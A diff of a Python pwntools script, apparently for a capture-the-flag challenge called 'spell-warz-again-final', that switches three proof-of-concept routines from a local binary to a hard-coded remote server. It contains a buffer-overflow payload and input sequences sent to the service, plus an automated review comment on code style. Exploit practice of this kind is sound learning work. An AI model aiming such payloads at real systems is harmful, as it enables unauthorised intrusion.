|
@ -1,10 +1,13 @@ |
|
|
from pwn import process |
|
|
|
|
|
|
|
|
from pwn import process, remote |
|
|
|
|
|
|
|
|
FILENAME = "./spell-warz-again-final" |
|
|
FILENAME = "./spell-warz-again-final" |
|
|
|
|
|
|
|
|
|
|
|
def run(): |
|
|
|
|
|
# return process(FILENAME) |
|
|
|
|
|
return remote("103.200.7.150", 60104) |
|
|
|
|
|
|
|
|
def poc0(): |
|
|
def poc0(): |
|
|
p = process(FILENAME) |
|
|
|
|
|
|
|
|
p = run() |
|
|
print p.recvuntil(">") |
|
|
print p.recvuntil(">") |
|
|
p.sendline(("A" * 32) + ("\x11\x11\x11\x11\x11\x11\x11\x11\x01")) |
|
|
p.sendline(("A" * 32) + ("\x11\x11\x11\x11\x11\x11\x11\x11\x01")) |
|
|
print p.recvuntil(">") |
|
|
print p.recvuntil(">") |
|
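Review bot: `run()` hard-codes the remote address and keeps the local launcher only as a commented-out line, so switching targets means editing the source, and `poc0`, `poc1` and `poc2` can no longer run against the local binary without a code change. Consider choosing the target at invocation time, e.g. `return remote(HOST, PORT) if args.REMOTE else process(FILENAME)`, with `HOST`/`PORT` as module constants next to `FILENAME` and `args` added to the `from pwn import ...` line. Now that `p` may be a network connection, the `p.recvuntil(">")` calls will block indefinitely if the service stalls; passing a `timeout=` would make such failures visible. The body of `poc0` continues outside this hunk, so whether the connection is ever closed cannot be seen here.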
@ -22,12 +25,12 @@ def poc0(): |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
def poc1(): |
|
|
def poc1(): |
|
|
p = process(FILENAME) |
|
|
|
|
|
|
|
|
p = run() |
|
|
print p.recvuntil(">") |
|
|
print p.recvuntil(">") |
|
|
p.sendline("Leo") |
|
|
p.sendline("Leo") |
|
|
print p.recvuntil(">") |
|
|
print p.recvuntil(">") |
|
|
p.sendline("y") |
|
|
p.sendline("y") |
|
|
for _ in range(100): |
|
|
|
|
|
|
|
|
for _ in range(2): |
|
|
print p.recvuntil(">") |
|
|
print p.recvuntil(">") |
|
|
p.sendline("3") |
|
|
p.sendline("3") |
|
|
print p.recvuntil(">") |
|
|
print p.recvuntil(">") |
|
@ -47,7 +50,7 @@ def poc1(): |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
def poc2(): |
|
|
def poc2(): |
|
|
p = process(FILENAME) |
|
|
|
|
|
|
|
|
p = run() |
|
|
print p.recvuntil(">") |
|
|
print p.recvuntil(">") |
|
|
p.sendline("__th3_w0rLd_D3str0Y3r__") |
|
|
p.sendline("__th3_w0rLd_D3str0Y3r__") |
|
|
print p.recvuntil(">") |
|
|
print p.recvuntil(">") |
|
|